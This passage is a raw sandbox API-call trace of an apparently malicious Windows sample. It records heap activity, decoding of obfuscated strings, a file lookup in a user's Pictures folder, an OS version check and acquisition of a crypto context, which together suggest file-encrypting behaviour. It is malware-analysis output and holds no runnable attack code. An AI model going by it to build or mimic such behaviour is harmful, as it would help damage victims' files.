wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0211.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0211.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0211.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0211.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0211.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0211.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0211.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0211.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0211.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0211.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0211.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0211.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0211.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0211.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0211.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0211.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0211.047] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0211.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0211.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0211.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0211.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0211.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0211.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0211.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0211.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0211.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0211.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0211.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0211.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0211.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0211.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0211.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0211.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0211.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0211.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0211.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0211.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0211.048] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/Oj8L14m5Ftw_q T.bmp", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d874440, ftCreationTime.dwHighDateTime=0x1d5ccc8, ftLastAccessTime.dwLowDateTime=0x91950f80, ftLastAccessTime.dwHighDateTime=0x1d5cf0c, ftLastWriteTime.dwLowDateTime=0x91950f80, ftLastWriteTime.dwHighDateTime=0x1d5cf0c, nFileSizeHigh=0x0, nFileSizeLow=0x115b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Oj8L14m5Ftw_q T.bmp", cAlternateFileName="OJ8L14~1.BMP")) returned 0x9e2138 [0211.048] FindClose (in: hFindFile=0x9e2138 | out: hFindFile=0x9e2138) returned 1 [0211.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0211.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0211.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0211.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0211.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0211.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0211.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0211.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0211.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0211.048] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0211.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0211.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0211.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0211.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0211.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0211.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0211.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0211.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0211.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0211.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0211.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0211.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0211.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0211.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0211.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0211.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0211.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0211.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0211.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0211.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0211.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0211.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0211.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0211.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0211.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0211.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0211.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0211.049] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.049] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0211.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0211.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0211.050] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0211.050] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0211.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0211.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0211.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0211.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0211.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0211.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0211.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0211.050] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0211.051] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.051] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0211.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0211.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0211.051] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0211.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0211.051] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0211.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0211.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0211.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0211.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0211.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0211.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0211.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0211.051] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0211.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0211.051] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0211.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0211.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0211.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0211.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0211.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0211.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0211.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0211.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0211.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0211.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0211.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0211.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0211.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0211.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0211.052] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0211.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0211.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0211.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0211.052] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0211.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0211.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0211.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0211.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0211.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0211.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0211.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0211.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0211.053] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0211.053] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.053] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0211.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0211.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0211.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0211.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.053] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0211.053] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0211.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0211.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0211.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0211.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0211.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0211.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0211.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0211.053] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0211.053] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0211.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0211.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0211.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0211.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0211.054] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.054] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.054] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.054] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.054] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0211.054] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0211.054] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.054] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.054] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0211.054] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.054] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0211.054] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0211.054] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0211.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7100, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0211.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0211.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6fe0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0211.055] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c2a8) returned 1 [0211.055] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.055] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.055] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0211.055] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.055] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0211.056] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.056] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.056] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.056] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.056] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.056] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.056] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0211.056] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, 